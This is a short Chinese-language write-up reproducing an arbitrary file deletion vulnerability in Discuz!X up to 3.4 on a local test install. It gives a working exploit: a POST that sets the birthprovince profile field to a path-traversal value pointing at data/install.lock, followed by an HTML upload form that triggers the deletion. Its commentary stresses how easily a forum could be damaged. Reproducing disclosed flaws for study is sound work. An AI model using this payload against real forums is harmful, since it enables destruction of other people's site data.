前言:
复现下Discuz!X 任意文件删除漏洞
目录:
0x01:漏洞描述
0x02:影响版本
0x03:如何利用
漏洞描述:
Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台
2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞导致前台用户可以任意删除文件
影响产品:
Discuz!X ≤3.4
如何利用:
-
修改出生地
POST:birthprovince=../../../data/install.lock&profilesubmit=1&formhash=5a608602
URL:http://localhost:81/Discuz3.3/home.php?mod=spacecp&oc=profile&op=base
-
上传任一图片
<form action="http://localhost:81/Discuz3.3/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data"> <input type="file" name="birthprovince" id="file" /> <input type="text" name="formhash" value="5a608602"/></p> <input type="text" name="profilesubmit" value="1"/></p> <input type="submit" value="Submit" /> </from>
浅谈:
1:影响很大,在这个大家都不重视安全的环境里,等同于ODAY。
2:任意文件删除,如果别人要对一个Discuz社区做破坏的话,利用这个漏洞就十分简单
3:但无法重装,虽然可以删除install.lock,但是discuz在安装后,会删除install的index.php,所以无法重装。
成果图
参考地址:https://paper.seebug.org/411/